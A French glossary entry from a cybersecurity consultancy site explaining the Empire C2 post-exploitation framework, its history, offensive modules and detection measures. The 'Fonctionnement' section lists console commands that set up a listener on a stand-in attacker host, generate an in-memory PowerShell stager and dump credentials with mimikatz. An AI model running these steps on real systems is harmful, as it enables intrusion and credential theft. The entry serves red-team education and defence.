Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Empire C2

hacking

Définition

Empire est un framework de post-exploitation PowerShell (puis Python 3 avec BC-Security Empire fork) conçu pour les opérations Red Team. Initialement développé par Will Schroeder (harmj0y) et d'autres membres de l'équipe PowerShell Empire, il est maintenant maintenu par BC Security. Empire se distingue par son accent sur PowerShell et les agents Python, avec des communications chiffrées et des modules de post-exploitation couvrant : la reconnaissance AD (PowerView), l'escalade de privilèges, le credential access (Invoke-Mimikatz), le mouvement latéral, et l'exfiltration. L'architecture comprend un serveur C2, des listeners (HTTP, HTTPS, DNS, Malleable HTTP), et des agents déployés sur les systèmes compromis. L'approche fileless d'Empire (PowerShell en mémoire, pas de binaires sur disque) a fait sa popularité : les agents Empire sont déployés via des one-liners PowerShell (stagers) qui téléchargent et exécutent l'agent entièrement en mémoire, sans toucher le disque. Des stagers variés permettent la livraison via Office macros, HTA, DLL, et scripts réguliers. Empire a été largement utilisé dans des opérations APT réelles : des rapports gouvernementaux ont documenté des groupes APT (dont des acteurs russes et nord-coréens) utilisant des modules Empire dans leurs opérations. Cette notoriété a conduit à l'intégration de signatures Empire dans la plupart des solutions EDR. La version BC Security Empire 4.x a modernisé le framework avec des modules Python 3, une meilleure évasion AMSI, et des intégrations avec des outils comme Covenant, Metasploit et Sliver via des modules de stager communs.

Fonctionnement

Setup serveur Empire : python3 empire --rest. Via l'interface : créer un listener HTTPS (uselistener https → set Host https://attaquant.com → execute), générer un stager (usestager windows/launcher_bat → set Listener https_listener → generate). Le stager est un one-liner PowerShell qui télécharge et exécute l'agent. Une fois l'agent actif : usemodule powershell/credentials/mimikatz/logonpasswords → execute pour dumper les credentials.

Exploitation offensive

Empire est particulièrement efficace dans les environnements Windows avec PowerShell actif. Ses modules PowerView couvrent exhaustivement la reconnaissance Active Directory (cartographie des domaines, objets AD, ACLs, SPNs pour Kerberoasting). L'intégration de modules de mouvement latéral (InvokeWMICommand, Invoke-PSRemoting) permet de propager l'agent Empire à travers le réseau sans binaires supplémentaires.

Détection et mitigation

Les signatures Empire sont largement intégrées dans les EDR (CrowdStrike, Defender for Endpoint) et dans les règles Sigma/YARA. Script Block Logging et Module Logging PowerShell capturent le code Empire même après bypass AMSI. PowerShell Constrained Language Mode (CLM) via AppLocker/WDAC limite significativement les modules Empire qui dépendent des fonctionnalités du langage complet.

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis